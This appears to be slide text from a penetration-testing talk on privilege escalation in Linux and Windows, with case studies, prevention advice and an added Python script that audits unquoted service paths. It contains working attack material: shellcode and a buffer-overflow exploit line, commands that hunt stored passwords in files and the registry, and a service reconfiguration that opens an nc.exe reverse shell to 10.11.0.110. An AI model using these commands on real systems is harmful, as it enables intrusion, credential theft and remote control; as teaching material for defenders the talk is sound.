  • 18. # “Privilege Escalation” Ways for Linux • Remote Exploit to vulnerable service running by high privilege users FILE_SERVER #ps –ef | grep root root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
  • 19. # “Privilege Escalation” Ways for Linux • Weak password of high privilege users Maybe use the password similar to username Maybe use weak password root Password P@ssw0rd ….
  • 20. # “Privilege Escalation” Ways for Linux • Credential store in file with weak permission • Configurations, Logs files • History • Env , $PATH
  • 21. # “Privilege Escalation” Ways for Linux • Restricted Shell Escape https://netsec.ws/?p=337
  • 22. # “Privilege Escalation” Ways for Linux • Restricted Shell Escape https://netsec.ws/?p=337https://0feci.wordpress.com/tag/escaping-restricted-shell-bypass/
  • 23. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Has permission “root” as user or group • Has set SUID, GUID • Can perform Overflow • Use Static Libc. (Nice to have)
  • 24. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Has permission “root” as user or group • Has set SUID, GUID list="$(find / -perm -4000 -o -perm -2000)";for i in $list; do ls -al $i; done ls –R / | grep “wsr” | grep “root”
  • 25. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users
  • 26. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users • Characteristic of vulnerable program • Can perform Overflow
  • 27. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Check buffer overflow position
  • 28. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Check buffer overflow position
  • 29. #objdump –d vul_app | grep “jmp” | grep “esp” # ROPgadget --binary vul_app --only "jmp“ | grep esp 0x08049f0f : jmp %esp # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users
  • 30. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users Shellcode system(“/bin//sh”) Shellcode= “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx62x69x6Ex89xE3x50x53x89xE1xB0x0BxCDx80” jmp %esp 0x08049f0f esp
  • 31. #python –c ‘ “A”*612 + “x0fx49x04x08” + “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx62x69x6Ex89xE3x50x53x89xE1xB0x0BxCDx80”’ | ./vul_app # “Privilege Escalation” Ways for Linux Privilege is dropped
  • 32. # “Privilege Escalation” Ways for Linux • Vulnerable Applications / Programs / Services use high privilege users #nano /tmp/sh.c
  • 33. # “Privilege Escalation” Ways for Linux #python –c ‘ “A”*612 + “x0fx49x04x08” + “x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90 x31xC0x50x68x2Fx2Fx73x68x68x2Fx74x6dx70x89xE3x50x53x89xE1xB0x0BxCDx80”’ | ./vul_app tmp • Vulnerable Applications / Programs / Services use high privilege users
  • 35. # “Privilege Escalation” Ways for Linux The real life is not easy !!!! • Canary (Buffer overflow detection) • Executable Stack Prevention (NX , DEP) • Address Space Layout Randomization (ASLR)
  • 36. # “Privilege Escalation” Ways for Linux But It’s possible to bypass !!! • Canary (Buffer overflow detection) -> Canary Repair • Executable Stack Prevention (NX , DEP) -> Ret-2-Libc , ROP • Address Space Layout Randomization (ASLR) -> Static Lib, App Warp Up https://www.slideshare.net/ammarit/unix-executable-buffer-overflow?qid=3ae3efd0-d1b4-4f3c-b85c- 82b1d063aa6b&v=&b=&from_search=1
  • 37. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users /etc/cron.d /etc/crontab /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly # ls -Ral /etc/cron*
  • 38. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users Reverse shell
  • 39. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users
  • 41. # “Privilege Escalation” Ways for Linux • Weak permission file of Jobs/Task run by high privilege users
  • 42. # “Privilege Escalation” Ways for Linux • Sudoer (Compromised user we got maybe in the sudoer list)
  • 43. # “Privilege Escalation” Ways for Linux • System Misconfiguration
  • 44. # “Privilege Escalation” Ways for Linux • Kernel Exploitation Ex: DirtyCOW
  • 45. # “Privilege Escalation” Ways for Linux • Kernel Exploitation (Trick) Ex: Linux version 2.6.9-89.EL • Compile exploit on the target system on target like environment • Metasploitable is good exploit compile environment
• 46. # “Privilege Escalation” Ways for Linux • Remote Exploitation by local host 127.0.0.1 #ps -ef | grep root root 1644 0.0 0.6 4504 1676 ? S 19:34 0:00 smbd -D
  • 47. # “Privilege Escalation” Ways for Linux • [Linux Privilege Escalation Scripts and Commands] Ref : https://netsec.ws/?p=309 LinEnum http://www.rebootuser.com/?p=1758 LinuxPrivChecker http://www.securitysift.com/download/linuxprivchecker.py Basic-linux-privilege-escalation https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation
  • 48. • LinuxPrivChecker # “Privilege Escalation” Ways for Linux
  • 49. • LinuxPrivChecker # “Privilege Escalation” Ways for Linux
  • 50. # “Privilege Escalation” Ways for Linux • Case Study :
  • 51. # “Privilege Escalation” Ways for Linux • Case Study :
  • 52. # “Privilege Escalation” Ways for Linux • Case Study : But no exploit detail in exploit-db !!!
  • 53. # “Privilege Escalation” Ways for Linux • Case Study :
  • 54. # “Privilege Escalation” Ways for Linux • Case Study :
• 55. # “Privilege Escalation” Ways for Linux • Case Study : [diagram labels: Low Priv, Bypass Restrict Shell, Dirty Cow, root, Crack root pass, Default password, Other Unix Servers, CMC]
  • 56. # “Privilege Escalation” Ways for Windows • Remote Exploit to vulnerable service running by high privilege users • Weak password of high privilege users • Credential store in file and Registry • Vulnerable Applications / Programs / Services use high privilege users • Weak permission file of Jobs/Task run by high privilege users • System Misconfiguration • Kernel Exploitation • Pass-the-hash • DLL Injection • DLL Hijacking • Remote Exploitation by local host • Hotpotato • Many more…
  • 57. # Remote Exploit to escalate privilege • Exploit to vulnerable service running with high privilege users
  • 58. # Remote Exploit to escalate privilege • Exploit to vulnerable service running with high privilege users Credit : Worawit Wangwarunyoo (sleepya)
• 59. # “Privilege Escalation” Ways for Windows • Exploit a vulnerability or misconfiguration of a service running as a high-privilege user
• 60. # “Privilege Escalation” Ways for Windows • Exploit a vulnerability or misconfiguration of a service running as a high-privilege user
• 61. # Remote Exploit to escalate privilege • Exploit a vulnerability or misconfiguration of a service running as a high-privilege user WebShell
  • 62. # “Privilege Escalation” Ways for Windows • Reverse Meterpreter “getsystem” command
  • 63. # “Privilege Escalation” Ways for Windows • Reverse Meterpreter “getsystem” command “It’s not always easy in the real life”
  • 64. • PS Migration # “Privilege Escalation” Ways for Windows
  • 65. • PS Migration # “Privilege Escalation” Ways for Windows
  • 66. • PS Migration # “Privilege Escalation” Ways for Windows
  • 67. # Remote Exploit to escalate privilege • Credential store in files findstr /si password *.txt findstr /si password *.xml findstr /si password *.ini Pass PASS PWD
• 68. # Remote Exploit to escalate privilege • Credential store in files c:\sysprep.inf c:\sysprep\sysprep.xml c:\unattend.xml %WINDIR%\Panther\Unattend\Unattended.xml %WINDIR%\Panther\Unattended.xml dir c:\*vnc.ini /s /b dir c:\*ultravnc.ini /s /b dir c:\ /s /b | findstr /si *vnc.ini
• 69. # Remote Exploit to escalate privilege • Credential store in DC Policy Script files (\\<DOMAIN>\SYSVOL\<DOMAIN>\Policies) https://adsecurity.org/?p=2288
• 70. # Remote Exploit to escalate privilege • Credential store in registry # VNC reg query "HKCU\Software\ORL\WinVNC3\Password" # Windows autologin reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # SNMP Parameters reg query "HKLM\SYSTEM\CurrentControlSet\Services\SNMP" # Putty reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Search for password in registry reg query HKLM /f password /t REG_SZ /s reg query HKCU /f password /t REG_SZ /s
  • 71. # Remote Exploit to escalate privilege • Credential store in registry
  • 72. # Remote Exploit to escalate privilege
  • 73. # Remote Exploit to escalate privilege http://www.labofapenetrationtester.com/2015/05/ dumping-passwords-in-plain-on-windows-8-1.html Windows Server 2012
  • 74. # Remote Exploit to escalate privilege
  • 75. # Remote Exploit to escalate privilege • Token Impersonation https://www.offensive-security.com/metasploit-unleashed/fun-incognito/
  • 76. • Insecure Services permission # “Privilege Escalation” Ways for Windows
  • 77. • Insecure Services permission -> Modify binpath # “Privilege Escalation” Ways for Windows https://technet.microsoft.com/en-us/sysinternals/accesschk.aspx
  • 78. • Insecure Services permission -> Modify binpath # “Privilege Escalation” Ways for Windows https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
  • 79. • Insecure Services permission -> Modify binpath (Example) # “Privilege Escalation” Ways for Windows
• 80. # “Privilege Escalation” Ways for Windows • Insecure Services permission -> Modify binpath (Example) sc config upnphost binpath= "C:\Inetpub\nc.exe -nv 10.11.0.110 5555 -e C:\WINDOWS\System32\cmd.exe"
  • 81. • Insecure Services permission by msf # “Privilege Escalation” Ways for Windows
  • 82. # “Privilege Escalation” Ways for Windows
• 83. # “Privilege Escalation” Ways for Windows • Unquoted Service Paths When Windows attempts to run this service, it will look at the following paths in order and will run the first EXE that it will find: Ref: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
• 84. # “Privilege Escalation” Ways for Windows • Unquoted Service Paths Ref: https://pentest.blog/windows-privilege-escalation-methods-for-pentesters/
  • 85. # “Privilege Escalation” Ways for Windows • Unquoted Service Paths
  • 86. # “Privilege Escalation” Ways for Windows • Unquoted Service Paths
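The search order the slide describes can be turned into an audit check. The script below is an added example (not code from the talk): it takes service command lines in the form `wmic service get name,pathname` prints them (the three rows here are constructed), flags unquoted image paths that contain spaces, and lists the executables Windows would try before the intended one, so a defender can verify those directories are not writable by standard users and quote the path.

```python
# Added example: audit service command lines for unquoted paths with spaces.
# Rows can be taken from `wmic service get name,pathname`; these are constructed.
CONSTRUCTED_SERVICES = [
    ("GoodSvc", r'"C:\Program Files\Good Vendor\good.exe" -run'),
    ("BadSvc", r"C:\Program Files\Bad Vendor\Sub Dir\bad.exe -k netsvcs"),
    ("SysSvc", r"C:\Windows\system32\svchost.exe -k LocalService"),
]


def split_image_path(cmdline):
    """Return (image_path, arguments, quoted) for a service command line.
    A quoted path is unambiguous; for an unquoted one we assume the image is
    everything up to the first token ending in .exe (Windows has no such rule)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end], cmdline[end + 1:].strip(), True
    tokens = cmdline.split(" ")
    for i, tok in enumerate(tokens):
        if tok.lower().endswith(".exe"):
            return " ".join(tokens[:i + 1]), " ".join(tokens[i + 1:]), False
    return cmdline, "", False


def candidate_executables(image_path):
    r"""Executables CreateProcess tries, in order, for an unquoted path: the
    string is cut at each space and .exe appended where the fragment has no
    extension, e.g. C:\Program Files\V\app.exe -> C:\Program.exe, then the full path."""
    tokens = image_path.split(" ")
    candidates = []
    for i in range(1, len(tokens) + 1):
        cand = " ".join(tokens[:i])
        if not cand.lower().endswith(".exe"):
            cand += ".exe"
        candidates.append(cand)
    return candidates


def audit_services(services):
    """Findings for services whose unquoted image path contains a space.
    'tried_first' lists the locations Windows checks before the real binary; a
    defender confirms none of their directories is writable by non-admins (icacls)."""
    findings = []
    for name, cmdline in services:
        image_path, _args, quoted = split_image_path(cmdline)
        if quoted or " " not in image_path:
            continue
        findings.append({"service": name, "image_path": image_path,
                         "tried_first": candidate_executables(image_path)[:-1]})
    return findings
```

Running `audit_services(CONSTRUCTED_SERVICES)` reports only BadSvc, with `C:\Program.exe`, `C:\Program Files\Bad.exe` and `C:\Program Files\Bad Vendor\Sub.exe` as the locations tried first.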
  • 87. # “Privilege Escalation” Ways for Windows
  • 88. # “Privilege Escalation” Ways for Windows
• 89. # “Privilege Escalation” Ways for Windows • Unquoted path + MS15-067
• 90. # “Privilege Escalation” Ways for Windows • Unquoted path + MS15-067
• 91. # “Privilege Escalation” Ways for Windows GGEZ • Unquoted path + MS15-067
• 92. # “Privilege Escalation” Ways for Windows • DLL Hijacking The way that Windows loads DLLs then, is to search the following directories in this order: – The directory from which the application loaded – C:\Windows\System32 – C:\Windows\System – C:\Windows – The current working directory – Directories in the system PATH environment variable – Directories in the user PATH environment variable https://msitpros.com/?p=2012 https://www.gracefulsecurity.com/privesc-dll-hijacking/
  • 93. • DLL Hijacking # “Privilege Escalation” Ways for Windows https://pentestlab.blog/2017/03/27/dll-hijacking/
  • 94. # “Privilege Escalation” Ways for Windows • DLL Hijacking https://pentestlab.blog/2017/03/27/dll-hijacking/
  • 97. # “Privilege Escalation” Ways for Windows • Driver Exploitation
• 98. # “Privilege Escalation” Ways for Windows • Driver Exploitation Example : Jungo DriverWizard WinDriver < 12.4.0 - Kernel Pool Overflow Privilege Escalation https://www.exploit-db.com/exploits/42665/
  • 99. • HOT Potato # “Privilege Escalation” Ways for Windows
  • 100. • HOT Potato # “Privilege Escalation” Ways for Windows Manual add user Use Hot Potato technique
• 101. # “Privilege Escalation” Ways for Windows • Pass-the-Hash
  • 102. • Remote Exploit on the localhost # “Privilege Escalation” Ways for Windows
  • 103. # “Privilege Escalation” Ways for Windows • Local exploit with Metasploit
  • 104. # “Privilege Escalation” Ways for Windows • Local exploit with Metasploit
  • 105. • Local Exploit to escalate privilege # “Privilege Escalation” Ways for Windows
  • 106. # “Privilege Escalation” Ways for Windows
  • 107. # “Privilege Escalation” Ways for Windows • Local Exploit to escalate privilege
  • 108. # “Privilege Escalation” Ways for Windows
• 109. # “Privilege Escalation” Ways for Windows dpkg --add-architecture i386 && apt-get update && apt-get install wine32 ; pip install pyinstaller
  • 110. # “Privilege Escalation” Ways for Windows DEMO Noobx_shell
  • 111. # “Privilege Escalation” Ways for Windows
  • 112. # “Privilege Escalation” Ways for Windows
• 113. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010 [diagram labels: DC1, Servers, Client PC, Unpatch]
  • 114. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010
  • 115. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010
• 116. # “Privilege Escalation” Ways for Windows • Case Study 2 # MS17-010 [diagram labels: DC1, Servers, Client PC, Unpatch]
  • 117. # “Privilege Escalation” on other devices • Mobile Phone • Root or Jailbreak • DirtyCow • Network Device • Remote Exploit • EXTRABACON exploit • Backdooring • ROM0 • Password Crack of high privilege level account
  • 118. # “Privilege Escalation” on other devices
• 119. # Prevention • Secure by design • System hardening • Disable unused services • Disable/remove unused programs, users or backup files • Install endpoint security • Strong Access Control and Authentication • Least Privilege • Patch Management • Security Assessment • Vulnerability Assessment • Penetration Testing
  • 120. Q & A
  • 122. Thank You Ammarit Thongthua, CISSP CISM GXPN Risk Advisory Manager, Deloitte Thailand
• 123. # References • http://www.fuzzysecurity.com/tutorials/16.html • https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html • https://github.com/rmusser01/Infosec_Reference/blob/master/Draft/Privilege%20Escalation%20%26%20Post-Exploitation.md • http://www.hackingarticles.in/7-ways-get-admin-access-remote-windows-pc-bypass-privilege-escalation/ • https://pentestlab.blog/2017/04/04/dll-injection